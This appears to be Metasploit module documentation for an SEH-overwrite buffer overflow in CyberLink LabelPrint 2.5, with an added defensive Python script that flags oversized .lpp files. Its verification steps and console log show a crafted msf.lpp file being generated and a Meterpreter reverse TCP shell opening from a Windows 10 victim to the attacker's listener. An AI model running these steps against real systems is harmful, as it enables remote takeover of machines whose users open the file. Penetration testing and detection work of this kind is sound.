## Description

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when a .lpp project file containing an overly long string is opened
via the open file menu. The overflow overwrites a structured exception handler (SEH) record, which allows
taking over the application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
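
For defenders, the trigger condition described above (an overly long string inside a .lpp file) can be checked before a file reaches a workstation. The following triage script is an added example, not part of the module or of CyberLink's software; the names `triage` and `scan_tree`, the 1024-byte threshold, and the delimiter set are assumptions, and the samples are constructed.

```python
import re
from pathlib import Path

# Assumption: no legitimate project value comes near this length (tune per site).
MAX_RUN = 1024

# A "run" is a stretch of bytes with no quote, angle bracket or line break.
# This is a format-agnostic heuristic, not a parser for the real .lpp layout.
RUN = re.compile(rb"[^\"'<>\r\n]+")


def triage(data: bytes, limit: int = MAX_RUN) -> dict:
    """Measure the longest delimiter-free run and how much of it is non-printable."""
    longest = max(RUN.finditer(data), key=lambda m: m.end() - m.start(), default=None)
    if longest is None:
        return {"suspicious": False, "longest": 0, "offset": 0, "binary_ratio": 0.0}
    run = longest.group()
    binary = sum(1 for b in run if b < 0x20 or b > 0x7E)
    return {
        "suspicious": len(run) > limit,
        "longest": len(run),
        "offset": longest.start(),
        "binary_ratio": round(binary / len(run), 3),
    }


def scan_tree(root: str, limit: int = MAX_RUN) -> list:
    """Return (path, report) for every oversized .lpp file under root."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".lpp":
            report = triage(path.read_bytes(), limit)
            if report["suspicious"]:
                hits.append((str(path), report))
    return hits


# Constructed samples (illustrative markup, not the real .lpp layout).
BENIGN = b'<PROJECT>\n  <ITEM name="Holiday photos 2018" />\n</PROJECT>\n'
OVERSIZED = b'<PROJECT>\n  <ITEM name="' + b"A" * 4000 + b'" />\n</PROJECT>\n'

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, triage(sample))
```

A high `binary_ratio` on a flagged run is a further signal that the value is not ordinary label text, and the reported `offset` gives an analyst the position to inspect.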

## Vulnerable Application

CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)

## Verification Steps

1. `./msfconsole`
2. `use exploit/multi/handler`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set lhost <lhost>`
5. `set exitonsession false`
6. `exploit -j`
7. `use windows/fileformat/cyberlink_lpp_bof`
8. `set lhost <lhost>`
9. `set target 2`
10. `exploit`
11. Copy file to Win10 host and open in vulnerable software
12. Get a shell

## Scenarios

### Tested on Windows 10 x64 running CyberLink LabelPrint v2.5

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit

[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
```
